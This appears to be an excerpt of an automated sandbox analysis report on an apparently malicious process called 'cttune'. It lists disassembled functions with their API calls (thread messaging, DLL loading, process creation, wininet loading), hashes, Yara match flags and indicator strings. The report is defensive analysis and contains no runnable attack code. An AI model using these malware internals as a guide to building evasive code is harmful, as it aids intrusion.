                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 98f5c8d7dcc5c437f668b62002e346d0a7bbd6c0a54965b887a9722a5656b4d6
                                        • Instruction ID: 49dd3297981e40d1d83f683f16bb8f733cf186344a75818b3376d47e8e88c412
                                        • Opcode Fuzzy Hash: 98f5c8d7dcc5c437f668b62002e346d0a7bbd6c0a54965b887a9722a5656b4d6
                                        • Instruction Fuzzy Hash: 9C90023164540912F1507159851474600058BD0346F55C015A0025654D8756DB5676A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 24df05ac465fde82c37df761a39d87d2b0a39c4cb5edce8aee0dc99a4b62b551
                                        • Instruction ID: e5ee281d167c428a4931fae2f7ede6fc96e61caacbdf3efea272a0c35a540172
                                        • Opcode Fuzzy Hash: 24df05ac465fde82c37df761a39d87d2b0a39c4cb5edce8aee0dc99a4b62b551
                                        • Instruction Fuzzy Hash: 9C90026124240113610571598514616400A8BE0246B55C025E1015590DC526D9926126
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 4bf16b4769156110b4f4325acd76571c048770d9252a5ba5f042895875244a0c
                                        • Instruction ID: 625463630d8476555246e28932410a51ab795a59cd3a9acf09c7bd0a835b99ea
                                        • Opcode Fuzzy Hash: 4bf16b4769156110b4f4325acd76571c048770d9252a5ba5f042895875244a0c
                                        • Instruction Fuzzy Hash: D790023164550512F1007159861470610058BD0246F65C415A0425568D8796DA5265A3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: dfd69dd0711a32a0796c5168da9f097809d92b2fc14e4915ddd067188f442d74
                                        • Instruction ID: 84d5f06a07a308652609960dda7c628fb51c3935c7257e30c74b313aaa031f09
                                        • Opcode Fuzzy Hash: dfd69dd0711a32a0796c5168da9f097809d92b2fc14e4915ddd067188f442d74
                                        • Instruction Fuzzy Hash: 0A90022128545212F150715D85046164005ABE0246F55C025A0815594D8556D9566222
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F103F9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 416 2f103f9-2f103fb 418 2f10404-2f1046e call 2f29880 call 2f2a290 call 2f13db0 call 2f01410 call 2f20be0 416->418 419 2f103fd-2f10403 416->419 432 2f10490-2f10495 418->432 433 2f10470-2f10481 PostThreadMessageW 418->433 419->418 433->432 434 2f10483-2f1048d 433->434 434->432
                                        APIs
                                        • PostThreadMessageW.USER32(F-385HLwx,00000111,00000000,00000000), ref: 02F1047D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: F-385HLwx$F-385HLwx
                                        • API String ID: 1836367815-2050541360
                                        • Opcode ID: 178b5ce361542561c817cb21cb0667520edaa17e5ffcda4d86f6f0f2357c969b
                                        • Instruction ID: 82366494df9e0959cb85b5ab1aebd871de95ad6522bebd0d8cc3462f8923725b
                                        • Opcode Fuzzy Hash: 178b5ce361542561c817cb21cb0667520edaa17e5ffcda4d86f6f0f2357c969b
                                        • Instruction Fuzzy Hash: A3110831D4021876EB20D6908C42FDF7B7D9F42B94F104068FF04BB2C0DAB4660A8BE5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F103B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 435 2f103b6-2f103be 436 2f103c0-2f103c1 435->436 437 2f10406-2f1046e call 2f29880 call 2f2a290 call 2f13db0 call 2f01410 call 2f20be0 435->437 436->437 448 2f10490-2f10495 437->448 449 2f10470-2f10481 PostThreadMessageW 437->449 449->448 450 2f10483-2f1048d 449->450 450->448
                                        APIs
                                        • PostThreadMessageW.USER32(F-385HLwx,00000111,00000000,00000000), ref: 02F1047D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: F-385HLwx$F-385HLwx
                                        • API String ID: 1836367815-2050541360
                                        • Opcode ID: 9a36689ad9121a44de5a1ceed72e1e369a3455471f21de45c02860ed9b7d12e6
                                        • Instruction ID: 9e4b566b9ad4e742be7cb4bb278a7144e186b970d807a82ccce0d558099122fa
                                        • Opcode Fuzzy Hash: 9a36689ad9121a44de5a1ceed72e1e369a3455471f21de45c02860ed9b7d12e6
                                        • Instruction Fuzzy Hash: E5110871D4025876EB219BA08C41FDF7B7D9F86B94F148058FB047B180DBB566058BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F10400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • PostThreadMessageW.USER32(F-385HLwx,00000111,00000000,00000000), ref: 02F1047D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: F-385HLwx$F-385HLwx
                                        • API String ID: 1836367815-2050541360
                                        • Opcode ID: 6f16093abcb75afc08f80caf8fc12a93d10469afffb86cc10ad7a40c6ab52597
                                        • Instruction ID: d386256388554f18b77e86d209dbef604ba91bda720017f6302c131bbf4c2df0
                                        • Opcode Fuzzy Hash: 6f16093abcb75afc08f80caf8fc12a93d10469afffb86cc10ad7a40c6ab52597
                                        • Instruction Fuzzy Hash: 75019631D4021876EB21AB908D42FDF7B7C9F42B94F548054FF047B1C0DAB466068BE5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F224C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(000007D0), ref: 02F2258B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: net.dll$wininet.dll
                                        • API String ID: 3472027048-1269752229
                                        • Opcode ID: 784aaf77d5b399701ac6a501a06329dca741195e0f970abb7375bda6e55da39b
                                        • Instruction ID: f95b849f2c96e2317a619556391668fd0db9153fdfda233c3f1c25e99d32e4fa
                                        • Opcode Fuzzy Hash: 784aaf77d5b399701ac6a501a06329dca741195e0f970abb7375bda6e55da39b
                                        • Instruction Fuzzy Hash: 62318FB1A01705BBD718DF64DC80FEBBBA9AB49344F00861DEA1D5B240D7B4B648CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F1E535 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 02F1E557
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Initialize
                                        • String ID: @J7<
                                        • API String ID: 2538663250-2016760708
                                        • Opcode ID: 07d2057e42144e829da405c877f3e3a9a727bb7555e86e53cf14d9ead322da79
                                        • Instruction ID: ba74dfd314f2da4ec87b2607ac255fceec899e2a49dca82cebce676071cb2817
                                        • Opcode Fuzzy Hash: 07d2057e42144e829da405c877f3e3a9a727bb7555e86e53cf14d9ead322da79
                                        • Instruction Fuzzy Hash: 413161B5A1020A9FCB00DFD8D8809EEB7B9FF88304B508559EA05E7254D771EE05CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F1E540 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 02F1E557
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Initialize
                                        • String ID: @J7<
                                        • API String ID: 2538663250-2016760708
                                        • Opcode ID: e1eba3b0b6ac7864ee88c80ad21b8cb6195fc32b6197c85253987ba3f00d1c59
                                        • Instruction ID: c91e2ffba7dd554a06f1905677ef72cc5319e272515725d1f0be12f4217abd39
                                        • Opcode Fuzzy Hash: e1eba3b0b6ac7864ee88c80ad21b8cb6195fc32b6197c85253987ba3f00d1c59
                                        • Instruction Fuzzy Hash: 283121B5A1060A9FDB00DFD8DC809EEB7B9BF88304F508559EA05E7254D775EE05CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F13DB0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F13E22
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                        • Instruction ID: 0b153d1db967cd723eec4916efcf90a3e3491c1d29d806b2dca1c3553de46ce5
                                        • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                        • Instruction Fuzzy Hash: BB011EB5E4020DABDB10DBE4DD41FADB3799B44348F004195AA1997241F631EB188B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F27D00 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(00000044,00000000,00000000,0000000C,00000000,02F1A5AC,000000C2,?,?,00000000,000000C2,02F1A5AC,00000000,0000000C,00000000,00000000), ref: 02F27D5C
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: c94c7cf0e98490c440888b266781f1c6e82bee1177f2a697f906d08cb5c6cfd2
                                        • Instruction ID: 043add1e0971e4107b698119365d4c2fef350cea61078f61fa16a5fa8f897364
                                        • Opcode Fuzzy Hash: c94c7cf0e98490c440888b266781f1c6e82bee1177f2a697f906d08cb5c6cfd2
                                        • Instruction Fuzzy Hash: 2A019DB2214108BBDB44DF89DC90EEB77AEEF8D754F518208BA09E3240D630F8518BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F17720 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02F176FC
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: bda7ca037f7c52905323fa67361874b677bd2cbd24d9ffbba467305932c825e4
                                        • Instruction ID: b5bb8b1628cf5762f8d4416df9a9c3b17171c40c638c32861d83872e9b26c7a9
                                        • Opcode Fuzzy Hash: bda7ca037f7c52905323fa67361874b677bd2cbd24d9ffbba467305932c825e4
                                        • Instruction Fuzzy Hash: 5A01FE3A10D38E0ED7123E389C855E1FB01AF47178FA0175AE4788B5C1C322A14BC781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F09420 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F09465
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 55ce587b8284c223f690ccdb09d1ccb184516ef4aa7cde6468128aade3eefb67
                                        • Instruction ID: 6cfb1a79c554cbd3fc74a75b1a5855c59107b8d35e18441388bbb88fdd598cfc
                                        • Opcode Fuzzy Hash: 55ce587b8284c223f690ccdb09d1ccb184516ef4aa7cde6468128aade3eefb67
                                        • Instruction Fuzzy Hash: 9EF0657778031476E23061E99C02FDBB34CCB81BE5F140025FB0DDB1C0E995B44186A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F09418 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F09465
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: b52d03d309dcec60c9c00c89443133a19a20d1a3389db2ca8b815a29ba5b72ba
                                        • Instruction ID: d6b74b82542e4d413ab34d1eeddd4337dba8ffd92d700e1fd0fb01f315bbc518
                                        • Opcode Fuzzy Hash: b52d03d309dcec60c9c00c89443133a19a20d1a3389db2ca8b815a29ba5b72ba
                                        • Instruction Fuzzy Hash: 60F0A077780604B6E63166A5CD02FDBB299CF42BE1F158415FB0DAB1C0F9E6B84086E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F1B8D6 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 7a12bc4f2f4985567163a987e53d1f54f8c60e59fec3245f7fca75a7ef321693
                                        • Instruction ID: e7d9b4aa8649a3602c9b58f83313fb26c206de21d3ac6b9f4c3e3be67d9e49f7
                                        • Opcode Fuzzy Hash: 7a12bc4f2f4985567163a987e53d1f54f8c60e59fec3245f7fca75a7ef321693
                                        • Instruction Fuzzy Hash: EDE0687A6002197F9312E9B99C48CDF7B6EFB40664B008379F605C3240EF62951983D4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F27C70 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FC45C7F4,00000007,00000000,00000004,00000000,02F13686,000000F4,?,?,?,?,?), ref: 02F27CAF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: 648b5efaa759b0e139c8e2afcc0a6dbea3d3e6302be444bec09973ef246f062a
                                        • Instruction ID: 41c48a4bf3ce4048b921cd8dfb6efde83025fd5217e8afa4675735ac5590eb3d
                                        • Opcode Fuzzy Hash: 648b5efaa759b0e139c8e2afcc0a6dbea3d3e6302be444bec09973ef246f062a
                                        • Instruction Fuzzy Hash: CCE065B2200308BBD610EE58EC41FAB77ADEFCA750F004018FA08A7242C671B8118BF8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F27C20 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(02F11019,?,02F2442D,02F11019,02F23FC7,02F2442D,?,02F11019,02F23FC7,00001000,?,?,02F294D0), ref: 02F27C5C
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 6c0510d663b59ed82a934a12d0b7eb398c059fd4ed6371b5ef1089e3b3d4c910
                                        • Instruction ID: 7220cace4d4499ca1ba78d04903015ed76d654b59ad721ca8407503df55b3e96
                                        • Opcode Fuzzy Hash: 6c0510d663b59ed82a934a12d0b7eb398c059fd4ed6371b5ef1089e3b3d4c910
                                        • Instruction Fuzzy Hash: AEE06D752002047BD614EE58DC40F9B77ADEFC9B50F104408FA08A7241C670BD108BB4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F176D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02F176FC
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: fddc79992a73e18d7b7d48847644827b8e3a54cdc539dcf7326e9bf5964e4165
                                        • Instruction ID: fcdd0a04791aaa4f0f6f7409b7caab3b0ba8e1fcfe6b2aa5ceb5ded75932d1bb
                                        • Opcode Fuzzy Hash: fddc79992a73e18d7b7d48847644827b8e3a54cdc539dcf7326e9bf5964e4165
                                        • Instruction Fuzzy Hash: F3E0807565030817E72475A8DC45F6633584F4D7A8F544960FA1CDB1C1E7B9F5414150
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F174E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,?,02F11300,02F266E7,02F23FC7,?), ref: 02F17513
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 7768fdbd7015edcd62bff719db9fd343949df481691028574dffe46a476480c0
                                        • Instruction ID: 606c9cc13d05c621513200abe5704c989a5eb10faee7db340d9167f449a5d8ee
                                        • Opcode Fuzzy Hash: 7768fdbd7015edcd62bff719db9fd343949df481691028574dffe46a476480c0
                                        • Instruction Fuzzy Hash: 9ED05E727803053BF610F6F4CC06F5A328D8B017E8F454464BA0CD73C2EDA5F1408666
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: ca2f7369d7034da523fdcff0fd4a1d5c509715cb479000fc504bd210b5a7a18d
                                        • Instruction ID: a72d2d91e94d43675e2e42d617a4b9fd4e1b6362eb66f43492562c3b081d9a02
                                        • Opcode Fuzzy Hash: ca2f7369d7034da523fdcff0fd4a1d5c509715cb479000fc504bd210b5a7a18d
                                        • Instruction Fuzzy Hash: F3B09B71D415C5D5FB11F761470C7177A006BD1756F16C065D2430641E4739D5D2E1B6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 02F11D10 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c52ac1a60227c4f32545128d218189622c81bc10bcd7622a2add4503ab627d11
                                        • Instruction ID: aea262d0989cd789e121bfaf89f9314a006f0198d56b1362d1b8a4e468e903df
                                        • Opcode Fuzzy Hash: c52ac1a60227c4f32545128d218189622c81bc10bcd7622a2add4503ab627d11
                                        • Instruction Fuzzy Hash: 22C08C1BF08108824928585EB8C80B8F3B4D28B0E3B702697CE49F356A2503A4A20ACD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: 9f2a3eb18b82de184f3f188a44302915c55ccf62c4ed19bbb3f9d0500a40a878
                                        • Instruction ID: 878f067464f72426ef5578505679e76368fa32b6549cf6806cad82e41293ed1e
                                        • Opcode Fuzzy Hash: 9f2a3eb18b82de184f3f188a44302915c55ccf62c4ed19bbb3f9d0500a40a878
                                        • Instruction Fuzzy Hash: 2451FAB6F00216BFDB10DF9988845BEF7B8BB492057118169E4E9D7641E734FE0297E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05022410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: 0a57a3ddafebe8664c0f77b068d2cd668f432b54c456ac45b574806367e7f0d6
                                        • Instruction ID: 056bc0a3f7213c18a239520a2713262721bfb18de68f39858485d546d184a557
                                        • Opcode Fuzzy Hash: 0a57a3ddafebe8664c0f77b068d2cd668f432b54c456ac45b574806367e7f0d6
                                        • Instruction Fuzzy Hash: 13510579A00666AFDB30DEDCD89097EB7FAAF44200B44C85DE896D7641DA74EA408760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                        Download Yara Rule
                                        Strings
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04FE4655
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04FE46FC
                                        • ExecuteOptions, xrefs: 04FE46A0
                                        • Execute=1, xrefs: 04FE4713
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04FE4725
